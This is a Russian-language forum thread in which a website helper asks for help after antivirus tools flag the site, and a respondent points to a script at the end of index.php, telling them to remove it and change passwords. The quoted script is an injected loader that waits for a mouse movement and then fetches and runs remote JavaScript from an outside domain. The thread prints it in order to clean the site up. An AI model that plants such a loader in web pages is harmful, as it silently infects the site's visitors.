Перейти к содержанию

Вирус на сайте


Рекомендуемые сообщения

Доброго времени суток!

У меня следующая проблема: я помогаю в администрировании сайта mtt.com.ua. Все было хорошо и вот месяц назад начались проблемы - на многих страницах сайта разные антивирусные системы (в т.ч. и касперский) начали ругаться. Сам сайт я не создавал (там самописная админка и изобретателя найти не представляется возможным). До поры, до времени я не особо нервничал т.к. все вирусы были в java-скриптах, которые я аккуратненько удалял (сделав бэкап) и при этом функционал не менялся (по крайней мере я не видел и жалоб до сих пор не поступало). Но сейчас беда оказалась в index-ном файле категории... Тут уже мириться не представляется возможным.

 

Ссылка проверки на вирусы: virustotal

 

Заранее благодарю за помощь в решении проблеммы.

Сообщение от модератора Mark D. Pearlstone
Файл и потенциально вредоносная ссылка удалены. Если потребуется, хелперы запросят у вас ссылку, которую вы можете им передать через личные сообщения.
Ссылка на комментарий
Поделиться на другие сайты

Отредактируйте index.php

Удалите оттуда скрипт в самом конце:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

 

Смените пароли на админку, хостинг и прочие.

Ссылка на комментарий
Поделиться на другие сайты

Адрес https://ajax.googleapis.com/ajax/libs/jquer...1/jquery.min.js вроде как безобидный...

 

Дело в том, что этот скрипт предназначается для вставки Google Analytics из админки. Другой вопрос, что на других старницах все норм, а тут... Я абсолютный дуб в java, поэтому не знаю какой фрагмент отсюда вырезать, чтобы функционал остался на месте, а вируса не было...

 

P.s. собственно, где тут вирус? Поясните пожалуйста... просто чтобы на будущее знать.

Ссылка на комментарий
Поделиться на другие сайты

Отрежьте все после

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>

А лучше вырежьте все. А после - вставьте код от Google Analytics

Изменено пользователем SLASH_id
Ссылка на комментарий
Поделиться на другие сайты

У меня в данный момент не ругается на http://mtt.com.ua/
Аналогично.. все нормально.

На данную ссылку и утром антивирус не ругался, поэтому она была не удалена. Ссылка же с детектом была убрана из первого сообщения.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Ser_S
      От Ser_S
      Здравствуйте, если, например задать маску проверки сайтов например *.mail.ru, то проверяется зона ru, затем mail и затем если звёздочка, то  все эти поддомены соответствуют условию.
      Непонятно, если условие написать mail.*, то будет ли проверяться каждая зона(ru, net, com и т.д.) на содержание поддомена mail?
    • Хасан Абдурахман
      От Хасан Абдурахман
      Открываеш гугл. Кликаеш по ссылке на какой нибудь сайт . И ждешь, пока касперский решит его открыть. Иногда 3-5 минут ждешь. Аж вся душа выматывается.  
    • maks_b
      От maks_b
      Добрый день.
      Настраиваю блокировку доступа к сайтам, сделал тестовое правило для блокировки доступа к сайту, например к ok.ru. Сайт блокируется все норм, но при включении этого правила перестает соединяться через SSL Network Extender. И любое правило запрета доступа через веб-контроль блокирует соединение через SSL Network Extender. Ошибка на скрине. Если правило отключить, то все работает. Подскажите, как исправить?
      Версия Каспера KES 12.6., KSC тоже последней версии.


    • 2life
      От 2life
      Здравствуйте, Kaspersky Virus Removal Tool находит в памяти HEUR:Trojan.Multi.Powedon.d, процедура лечения с перезагрузкой не помогает.
       
      Заранее спасибо
       
      Прикладываю репорт Kaspersky Virus Removal Tool
      2024.12.08_22.46.43.zip
    • civiero
      От civiero
      При просмотре видео на ютуб останавливается видео и появляется звуки костей, или слово amazing. Нужно ли волноваться по этому поводу? Антивирус ничего не выдает.
×
×
  • Создать...